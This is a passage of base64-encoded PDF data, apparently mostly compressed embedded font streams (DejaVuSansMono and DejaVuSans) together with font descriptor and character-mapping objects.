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wwMDAwPgo8MDAwMT4gPDAwNDg+IFs8MDA1Mz4gPDAwNzU+IDwwMDYyPiA8MDA2QT4gPDAwNjU+IDwwMDYzPiA8MDA3ND4gPDAwM0E+IDwwMDA5PiA8MDA2Rj4gPDAwNkQ+IDwwMDZFPiA8MDA0RT4gPDAwNjE+IDwwMDNEPiA8MDAzMT4gPDAwMzA+IDwwMDJFPiA8MDAzND4gPDAwMzc+IDwwMDM4PiA8MDAyRj4gPDAwNzI+IDwwMDY3PiA8MDA2OT4gPDAwN0E+IDwwMDQ5PiA8MDA1Nz4gPDAwNjQ+IDwwMDczPiA8MDA1MD4gPDAwNzk+IDwwMDRDPiA8MDA0Rj4gPDAwNzY+IDwwMDY4PiA8MDA1Rj4gPDAwNDE+IDwwMDU1PiA8MDA0Nj4gPDAwNkM+IDwwMDQ0PiA8MDAyRD4gPDAwNDI+IDwwMDQ1PiA8MDA0Nz4gPDAwNDg+IDwwMDUyPiA8MDA1Nj4gPDAwNTQ+IDwwMDRCPiA8MDA1OT4gPDAwMzM+IDwwMDQzPiA8MDA1QT4gPDAwNTg+IDwwMDZCPiA8MDAzNT4gPDAwMzk+IDwwMDUxPiA8MDA3Nz4gPDAwMzI+IDwwMDc4PiA8MDAzNj4gPDAwMkI+IDwwMDRBPiA8MDA0RD4gPDAwNzE+IDwwMDcwPiA8MDA2Nj4gPDAwMjg+IDwwMDI5PiBdCmVuZGJmcmFuZ2UKZW5kY21hcApDTWFwTmFtZSBjdXJyZW50ZGljdCAvQ01hcCBkZWZpbmVyZXNvdXJjZSBwb3AKZW5kCmVuZAoKZW5kc3RyZWFtCmVuZG9iago5IDAgb2JqCjw8IC9UeXBlIC9Gb250Ci9TdWJ0eXBlIC9UeXBlMAovQmFzZUZvbnQgL0RlamFWdVNhbnNNb25vCi9FbmNvZGluZyAvSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFsyMiAwIFJdCi9Ub1VuaWNvZGUgMjMgMCBSPj4KZW5kb2JqCjI0IDAgb2JqCjw8Ci9MZW5ndGggMTAKPj4Kc3RyZWFtCv///////////4AKZW5kc3RyZWFtCmVuZG9iagoyNiAwIG9iago8PCAvVHlwZSAvRm9udERlc2NyaXB0b3IKL0ZvbnROYW1lIC9RQUJBQUErRGVqYVZ1U2FucwovRmxhZ3MgNCAKL0ZvbnRCQm94IFstMTAyMC41MDc4MSAtNDYyLjg5MDYyNSAxNzkzLjQ1NzAzIDEyMzIuNDIxODcgXQovSXRhbGljQW5nbGUgMCAKL0FzY2VudCA5MjguMjIyNjU2IAovRGVzY2VudCAtMjM1LjgzOTg0MyAKL0NhcEhlaWdodCA5MjguMjIyNjU2IAovU3RlbVYgNDMuOTQ1MzEyNSAKL0ZvbnRGaWxlMiAyNyAwIFIKL0NJRFNldCAzMCAwIFIKPj4KZW5kb2JqCjI3IDAgb2JqCjw8Ci9MZW5ndGgxIDIwMzE2IAovTGVuZ3RoIDMxIDAgUgovRmlsdGVyIC9GbGF0ZURlY29kZQo+PgpzdHJlYW0KeJztOwt0E2W6/z95lB1WobRQxcNl2vIQCS22lGpZkLRN25Q0KUlaaEHoNJm0gSQTMklLweUhQkVUVARfFTnIup7Ksl51XWBXd12Vl+i9ZzncXXRXL3DRfXjvsu7uvQhker//n5k8SkEEfNxzbts0//zz/d/7NV9ThBFCg9AqpEPI4SosaprUMQl27odXY1ugy2c29fph/R8IDXm9XeC9wj6rCaGhO2BvajtsGD0ZdXD9O7ge0x6MLj3+4MgfIpQJl+hwQPTwYV00BNeH4bo9yC8No1JUjtCwKXDNhfigMFqsexau3QhNH4Sw/nr8EDIgZCg2PIEQ/iflXfcb5GOGIcQMNup0g/QMo/8Ehfp+jeJ97JiWCXrEfbfeZ/GimYjr6zNmy9n4yYwgPtmCcN9HfYQRxCCfvEXvM+wAKTMQysrMzRybm5nr06Pzku6m86fkLRnXn/ksYpwAkAeButtwFOWgPOBgRM6InKx83bjx4/LzM/Mzc/U5I4YbM4w4s7iodGop2dY9MPOO6TPePfaLWkt15+8O4QMYrViBZ1bE75MftlkxttoeZn6eU12zQm7HKzcX3RpfbziKFy3+7QN33sk44v9VWbHm7spyoBvuO6FfqV+ORqJ8oDs8FyiXEhqE3Hhu/LisoXBRlDMigxDNyzBm6Feef2lwu++nfsHT6m3zL5L/9tRWvPnR8yfuufunjNN171PzFlzHLGj+RauAR95YsuuWETm4pwezeNiz2/DDj7z1WHPznLlPAykk9p3Q7QfKxYQuYB8P2IcbQXD4GTE8G8jnwWYJXBChSwgE/IwrHacwpNtgd7ub76uw4KLJm+94y+Vc/v3fNPOtAZ+ntXV1dRW+tfiFmS/Y6jBeEn7P19ykv2PXzdlZ+JZb3Ob8cdz1t9js9/bMm4+HDR3z+tQbb5o00Vk7Yfy4IWNmWdc8P